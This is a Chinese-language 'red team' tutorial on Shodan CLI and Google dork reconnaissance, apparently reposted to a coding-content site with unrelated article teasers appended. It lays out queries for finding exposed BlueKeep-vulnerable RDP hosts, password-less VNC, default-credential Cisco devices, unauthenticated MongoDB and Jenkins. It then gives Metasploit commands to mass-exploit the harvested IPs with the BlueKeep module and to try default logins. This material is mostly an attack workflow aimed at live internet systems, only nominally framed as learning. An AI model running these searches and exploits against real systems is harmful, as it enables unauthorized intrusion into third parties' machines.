红队-shodan搜索引擎篇

news2024/11/23 8:34:19
如涉及侵权马上删除文章

笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负

一.shodan原理与功能的介绍

Shodan Search Engine

它是专门搜网络设备的,只要联网的,只要有IP地址的都可以称为网络设备

1.shodan:

在服务器上部署了各种扫描器,这些扫描器也就是我们安全见闻里面讲过的,什么漏洞扫描器,硬件扫描器(路由器交换机处理器),还有什么目录扫描器等等等,它们二十四小时不停的扫描

知道具体部署了扫描器

扫IP

2.功能

在线查询功能,和离线的客户端,monitor(监控)可以监控一些IP地址,它会帮我去扫描有什么漏洞有什么bug等,然后保存一些结果给我们,api接口调用,主要就是用于信息收集的。

3.kali安装shodan

(1)kali安装shodan

git clone https://github.com/achillelean/shodan-python.git

(2)切换到shodan-python文件夹

cd shodan-python

(3)安装

python setup.py install

(4)初始化shodan

shodan init api_key

api_key可以在你的shodan账号中找到

shodan -h

查看使用帮助文档

4.特殊代码

具体参照这个网站

世界各国国别简称(三位英文缩写).xls - 淘豆网

5.使用host 和 search参数

比如我今天要找一些IP 地址 看看它有什么服务

shodan search --limit 10 country:jp

里面信息有些杂了,我们可以过滤出一些重要信息.

shodan search --limit 10 --fields ip country:jp

结果为数字IP,那如何得到我们想要的格式呢? 加个str即可

shodan search --limit 10 --fields ip_str,post country:jp

得到了日本相关的十个IP,那我们还想要找个有危险端口3389的IP,城市在深圳

shodan search --limit 10 --fields ip_str port:3389 country:cn city:shenzhen

shodan host IP

类似于这样的,我们发现存在很多漏洞,这样就可以挨个尝试了(只涉及教学,他人恶意行为与本人无关)

利用shodan查看IP地址的历史数据

shodan host ip --histor

通过history来查看一些时间提供的服务

国别地区
country:cn

城市信息
city:shenzhen

端口
port:3389

操作系统
os:windows7

漏洞
has_vuln:True

设备:路由器
device: router

web端的一些设备
tp-link

6.使用parse 和 download参数

我们首先看看这个download

shodan download -h

shodan download 0708 --limit 10 --fields ip_str,port '\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00' (删掉过滤信息)

emmm没有一个结果...

shodan parse -h

进行一个解析

shodan parse --fields ip_str 文件路径(把文化拖过来)

可以进行一个查看
这就是一个批量刷漏洞的姿势好吧,希望大家遵纪守法,
为什么不用shodan search vuln:cve-2019-0708?

这种要更高级别的账号好吧,我们换种方式绕过它去批量刷洞

7.使用count参数

shodan count "\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"

上面这条命令是什么意思呢?就是说他这个数据库里面大概存在一万四千多万条与这个漏洞相关的东西,count就是数量的意思

8.使用honeyscore参数(判断是否为蜜罐)

shodan的honeyscore可以自动判断它是不是蜜罐:

shodan honeyscore ip地址

命令行工具蜜罐模块应该有点问题

所以去网站进行查看

honeyscore.shodan.io

9.vnc空密码

vnc(相当于是一个远程链接工具)

shodan search --limit 30 --fields ip_str "authentication disabled" port:5900

得到了大约30个关于没设置密码的IP

使用VNC直接进行远程链接

也可以选择下载下来数据

shodan download --limit 100 "authentication disabled" port:5900
shodan parse --fields ip_str 文件路径 > flag.txt

二,如何利用shodan查找漏洞

怎么去查一个cve-2019-0708的一个漏洞?

1.查找有关漏洞的网站以及其开放的端口

shodan search --limit 10 --fields ip_str,port "\x03\x00\x00\x0b\x06\xd0\x00\x00\x00\x124\x00"

十六进制字符串(类似于指纹的方式去找)

上面这串字符串就是cve-2019-0708 的十六进制漏洞特征,
有漏洞不代表能利用。

2.测试主机是否存活

输入IP用windows远程连接 

3.查看漏洞是否可以进行下一步

shodan host IP

4.尝试登录

远程链接出现。

测试弱口令 Administrator &Administrator 无法连接

把IP放到文本文件里面

可以使用metasploit去进行批量的漏洞利用,

msfconsole

 进入metasploit

search 0708 (0708是存有IP的文本文件)

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

show options

 查看选项设置

set rhosts file:'文件路径'(可以直接拖入IP地址文件)

check

进去不成功有几个点

首先 show options 看清我们的这个 payload, ip端口 要填对 (如图所示)

在一个就是show targets 它支持windows7, sever这种,要把targets 设置正确.

三,利用shodan搜索信息

1.查看出口IP

shodan myip 

该指令用于 查看自己的出口IP,哪个地址链接的公网

2.查看被黑客拿下的网站

shodan search --limit 10 --fields ip_str,port http.title:hacked by

有的黑客在黑了人家电脑之后会留什么hack到此一游这种

刷公益src是不是也可以利用这种办法找到有漏洞的网站呢?

shodan search --limit 10 --fields ip_str.port http.title:hacked by country:cn

我们精确到城市看看

shodan search --limit 10 --fields ip_str.port http.title:hacked by country:cn city:beijing

3.查看特定搜索的后台

还能搜些什么title关键字的网站呢 比如棋牌,比如,后台, mysql 等等这种关键字眼

shodan search --limit 10 --fields ip_str.port http.title:mysql
shodan search --limit 10 --fields ip_str.port http.title:后台

具体内容可以根据自己的想象力需求去搜.

4.查看弱口令设备

我们接下来带大家去搜一些弱口令设备,比如说思科,路由器等等

shodan search --limit 10 --fields ip_str,port "cisco -unauthorized port:23"

cisco: 对应思科

unauthorized: 对应未授权

打开相关工具输入username: admin/cisco   password: cisco进行尝试

看看运气好不好能不能连接上

5.搜索网段,组织,防火墙,前端信息

nsa ip address range

www.nsa.gov

shodan search --limit 10 --fields ip_str,port net:208.88.84.0/24

net: 某网站的一个网段

shodan search --limit 10 --fields ip_str,port org:nsgov has_vuln:true

搜索一些组织的IP地址

其中 has_vuln:指的是存在资产漏洞

shodan search --limit 10 --fields ip_str,port hostname:google

找一些网址所在组织的IP地址

shodan search --limit 10 --fields ip_str,port country:cn http.waf:safedog

http.waf: 查找一些安装了安全狗waf的网站

shodan search --limit 10 --fields ip_str,port country:cn http.html:login

http.html: 检索html前端页面中带有关键字的ip地址和title类似

6.搜索Mongodb未授权的数据库

shodan search --limit 10 --fields ip_str "Mongodb server information -authentication" port:27017

搜Mongodb未授权登录数据库mongodb自己下载未授权的一般能够直接链接数据库这个是必学的)
jenkins:(组件不懂得自己去搜不过多介绍

7.搜索Jenkins

shodan search --limit 10 --fields ip_str "X-Jenkins" OR "Set-cookie:JSESSIONID" http.title:"Dashboard"

hodan search:表示使用 Shodan 进行搜索操作。 --limit 10:限制搜索结果的数量为 10 个。 --fields ip_str:指定只返回搜索结果中的 IP 地址字段。

"X-Jenkins" OR "Set-cookie:JSESSIONID":这是搜索条件,意味着搜索结果中要么响应头包含“X-Jenkins”,要么“Set-cookie”的值包含“JSESSIONID”。使用“OR”逻辑运算符连接了这两个条件,扩大了搜索的范围。

http.title:"Dashboard":另一个搜索条件,表示 HTTP 响应的标题中包含“Dashboard”这个字符串。

Jenkins 主要作用:

一、自动化构建与部署 能自动从代码仓库获取代码并进行编译、打包等构建操作。可以把构建好的成果自动部署到不同环境中。

二、自动化测试 自动运行各种测试,如单元测试、集成测试等。

三、任务管理

可设置定时任务,按特定时间自动执行工作。 能管理任务间的依赖关系。 监控任务状态,失败时通知相关人员。

四、可扩展定制

有很多插件可满足不同需求,也能自行开发插件。 自动化测试 自动上线 自动回滚)

在渗透测试过程中的辅助作用

自动化测试:Jenkins 可以用于自动化渗透测试过程中的一些任务,如漏洞扫描、安全测试等。通过编写 Jenkins 任务,可以定期对目标系统进行安全测试,提高测试效率和覆盖范围。

持续集成与持续部署(CI/CD):在一些企业中, Jenkins 被用于 CI/CD 流程中。渗透测试人员可以利用 Jenkins 的 CI/CD 流程,在开发和部署过程中进行安全测试,及时发现和修复安全问题。

漏洞管理:Jenkins 可以与漏洞管理工具集成,帮助企业管理和跟踪安全漏洞。渗透测试人员可以利用 Jenkins 的漏洞管理功能,了解目标系统中存在的安全漏洞,并制定相应的攻击策略。

总之,Jenkins 在渗透测试中既可能是攻击目标,也可以作为辅助工具。渗透测试人员需要了解 Jenkins 的安全风险和漏洞,以及如何利用 Jenkins 来提高渗透测试的效率和效果。同时,企业也需要加强 Jenkins 的安全配置和管理,防止被恶意利用。

四,shodan搜索引擎主界面的利用

首先打开他们的官方网站Shodan Search Engine,比如还是拿0708漏洞举例好吧。

1.搜索框

直接在和命令行里面搜search 是一样的

深色版本
\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00

2.webcam (摄像头的一些信息)

3.monitor

shodan的一个模块,用来监控网站 ip用的

学术会员可以监控大约16个IP地址

4.manage

资产管理 添加要监控的网站 ip

5.settings

设置通知邮件

6.dashboard

现有监控的一些信息 端口 漏洞 ip地址 (存在cdn就会有多个地址)

shodan search --limit 10 --fields ip_str.port product:Apache httpd

搜索Apache中间件服务

shodan search --limit 10 --fields ip_str.port org:Tencent cloud

搜索腾讯云资产

五.shodan其他的姿势

 1.alert用法

shodan alert -h

查看帮助文档 这个就是昨天讲的怎么去配置ip监控 我们能在web页面上面去做这里就不去过多的讲.

2.info用法

shodan info

查看你查询的 扫描的一些次数 每个账户都是每个月有限制次数的

3.domain用法

shodan domain 域名

查询域名信息 有很多查询域名的工具不一定要用shodan 知道就行

4.scan用法

shodan实时的去扫描 就用scan 再扫描一次就OK了

shodan scan -h

查看帮助文档

其中关键的参数: 

submit 对IP/域名进行扫描查询       

list 看查询的信息 

shodan scan submit ip地址

shodan scan list

查看扫描信息

shodan stats --facets ssl.version country:cn has_ssl:true http

 

统计中国使用了ssl的ip,并用版本做一个统计.

主要你们得会各种参数的组合,国家地区、漏洞、版本、ip、数数。等等的一系列参数配合起来。

截图搜索参数:

has_screenshot:true cisco 

六.谷歌语法

我们继续看看Google搜索(因为它不值得我们去再开一个专题课,就在这一带而过了)

1.inurl

“inurl:admin”:查找包含 “admin”的网页URL,可能找到管理后台入口。

“inurl:login”:查找包含 “login”的登录页面。

“inurl:php?id=”:查找可能存在SQL注入漏洞的PHP页面。

“inurl:asp?id=”:查找可能存在SQL注入漏洞的ASP页面。

“inurl:jsp?id=”:查找可能存在SQL注入漏洞的JSP页面。

2.filetype

“filetype:pdf 关键词”:查找特定关键词的PDF文件。

“filetype:doc 关键词”:查找特定关键词的Word文档。

“filetype:xls 关键词”:查找特定关键词的Excel表格。

3.intitle

“intitle:后台管理”:查找标题中包含 “后台管理”的网页。

“intitle:登录页面”:查找标题中包含 “登录页面”的网页。

4.site

“site:.edu inurl:forum”:在教育机构网站中查找论坛页面。

“site:.com inurl:phpmyadmin”:在商业网站中查找可能存在的phpMyAdmin管理页面。

“site:.org inurl:password”:在非营利组织网站中查找包含 “password”的页面,可能找到泄露的密码信息。

“site:.net inurl:backup”:在.net域网站中查找备份文件。

“site:.com intitle:敏感信息”:在商业网站中查找标题包含敏感信息的页面。

“site:company.com inurl:confidential”:在特定公司网站中查找包含 “confidential”(机密)的页面。

“site:domain.com inurl:uploads”:在特定域网站中查找上传文件的目录。

“site:.edu.cn filetype:ppt 关键词”:在教育机构中文域网站中查找特定关键词的PPT文件。

“site:* .edu inurl:vulnerability”:在各种教育网站中查找包含 “vulnerability”(漏洞)的页面。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2230239.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

synchronized进阶原理

synchronized进阶原理 1.轻量级锁 轻量级锁的使用场景:如果一个对象虽然有多个线程访问,但多线程访问的时间是错开的(也就是没有竞争),那么可以使用轻量级锁来优化(如果出现竞争,操作系统会将轻量级锁升级为重量级锁)。轻量级锁对使用者是透明的(由操作系统控制),即语法仍是s…

JavaWeb——Web入门(3/9)-HTTP协议:概述(概念、特点,HTTP协议定义,基于 TCP 协议,基于请求-响应模型)

目录 概念 特点 内容预告 概念 HTTP 协议定义:全称 Hyper Text Transfer Protocol,即超文本传输协议,规定了浏览器与服务器之间数据传输的规则,具体指客户端浏览器与服务器之间进行数据交互的数据格式。 在互联网的世界中&…

Altium Designer使用技巧(二)

一、创建类 1、按DC键,打开对象类。 2、右键添加一个类。命名为PWR。 3、将所有的电源类,全部添加到新创建的类中,从非成员类中点选到成员类中。 4、右下角点panes ,点PCB。 5、然后在左边单击PWR,点连接,可显示或…

边缘计算【智能+安全检测】系列教程--agx orin解决RTC时间问题

因为是离线运行,首要问题是时间不准确,就在主板上加装了纽扣电池,但是会有一系列问题,比如无法将RTC时间回写到系统时间,或者无法将系统时间写到RTC中等等一些列问题。为解决这些问题,一劳永逸的方式&#…

React中常用的hook函数(二)——useReducer和useContext

React中常用的hook函数(一)——useState和useEffect_usestate useeffect-CSDN博客https://blog.csdn.net/Mrs_Lupin/article/details/142905749?sharetypeblogdetail&sharerId142905749&sharereferPC&sharesourceMrs_Lupin&spm1011.2480.3001.8118React中常用…

Java项目实战II基于Java+Spring Boot+MySQL的智能推荐的卫生健康系统(开发文档+数据库+源码)

目录 一、前言 二、技术介绍 三、系统实现 四、文档参考 五、核心代码 六、源码获取 全栈码农以及毕业设计实战开发,CSDN平台Java领域新星创作者,专注于大学生项目实战开发、讲解和毕业答疑辅导。获取源码联系方式请查看文末 一、前言 基于Java、…

《Linux系统编程篇》消息队列(Linux 进程间通信(IPC))——基础篇

文章目录 引言消息队列(Message Queue)消息队列的特点消息队列的特性消息队列的操作ipcs -q 拓展ipcrm 拓展注意事项 结论 “山重水复疑无路,柳暗花明又一村。” ——陆游 引言 《Linux系统编程篇》——基础篇首页传送门 想象一下&#xff0…

微服务设计模式 - 重试模式(Retry Pattern)

微服务设计模式 - 重试模式(Retry Pattern) 定义 重试模式(Retry Pattern)是一种微服务中的设计模式,用于在临时性失败(如网络故障或暂时不可用的服务)发生时,自动重新尝试请求&…

『 Linux 』网络传输层 - TCP(二)

文章目录 TCP六个标志位TCP的连接三次握手 四次挥手为什么是三次握手和四次挥手 重传机制 TCP六个标志位 在TCP协议报文的报头中存在一个用于标志TCP报文类型的标志位(不考虑保留标志位),这些标志位以比特位选项的方式存在,即对应标志位为0则表示为假,对应标志位为1则为真; SYN…

VLAN虚拟局域网,eNSP实验讲解

VLAN虚拟局域网,eNSP实验讲解 一、概念二、eNSP仿真实验1、实验一:vlan演示(交换机端口access模式)2、实验二:vlan演示(交换机端口trunk模式) 一、概念 VLAN(Virtual Local Area Ne…

Ubuntu UFW防火墙规则与命令示例大全

在服务器安全领域,防火墙是守护网络安全的坚实盾牌。UFW(Uncomplicated Firewall),即“不复杂的防火墙”,是一个运行在iptables之上的防火墙配置工具,它为Ubuntu系统默认提供了一个简洁的命令行界面&#x…

基于 Python 的 Django 框架开发的电影推荐系统

项目简介:本项目是基于 Python 的 Django 框架开发的电影推荐系统,主要功能包括: 电影信息爬取:获取并更新电影数据。数据展示:提供电影数据的列表展示。推荐系统:基于协同过滤算法实现个性化推荐。用户系…

ORB-SLAM2源码学习:ORBextractor.cc:IC_Angle 利用灰度质心法求解关键点方向角

ORB特征点: 特征点是由关键点和描述子两部分组成,关键点是指特征点在图像中的位置,描述子是用来描述关键点周围的像素信息。ORB关键点是在FAST关键点的基础上进行改进给像素增加了一个主方向,称为Oriented FAST。描述子在BRIEF的…

【设计模式】如何用C++实现依赖倒置

【设计模式】如何用C实现依赖倒置 一、什么是依赖倒置? 依赖倒置原则(Dependency Inversion Principle,DIP)是SOLID面向对象设计原则中的一项。它的核心思想是: 高层模块不应该依赖于低层模块,两者都应该…

‌植物神经紊乱患者,这些锻炼适合你!

植物神经紊乱是一种常见的心理疾病,其主要症状包括焦虑、抑郁、失眠等,严重时还可能出现心慌、气短、憋气、出汗异常等症状。然而,通过适量的锻炼,我们可以帮助调节自主神经系统,缓解这些症状。那么,植物神…

Golang | Leetcode Golang题解之第525题连续数组

题目: 题解: func findMaxLength(nums []int) (maxLength int) {mp : map[int]int{0: -1}counter : 0for i, num : range nums {if num 1 {counter} else {counter--}if prevIndex, has : mp[counter]; has {maxLength max(maxLength, i-prevIndex)} …

第十七届山东省职业院校技能大赛通知分享

近日,山东省教育厅联合相关部门发布了关于举办第十七届山东省职业院校技能大赛的通知,标志着这一旨在深化教育教学改革、推进产教融合与校企合作的重要赛事即将拉开帷幕。 据了解,本次大赛将设中等职业教育组和高等职业教育组,共包…

Angular实现gridview效果

说明&#xff1a;使用angular实现grid效果&#xff0c;支持文字图片多条数据展示 效果图: step1: <mat-grid-list cols"2" rowHeight"2:1"><mat-grid-tile *ngFor"let course of courses">{{ course }}</mat-grid-tile> &l…

web of sicence使用教程(研究生版)

学习视频链接 进入web of science 通过校园资料库进入进入&#xff0c;选择如下 核心检索规则 不区分字母大小写逻辑运算符 可以通过括号改变优先级 常用通配符 短语检索 检索界面 检索类型 选择数据库

2-8软件包管理

8.1 配置仓库 1.配置本地仓库 #进行代码安装前需要先进行仓库配置和挂载 [rootlocalhost ~]# cd /etc/yum.repos.d [rootlocalhost yum.repos.d]# vim base.repo [baseos] namebaseos baseurl/mnt/BaseOS gpgcheck0 [appstream] nameappstream baseurl/mnt/AppStream gp…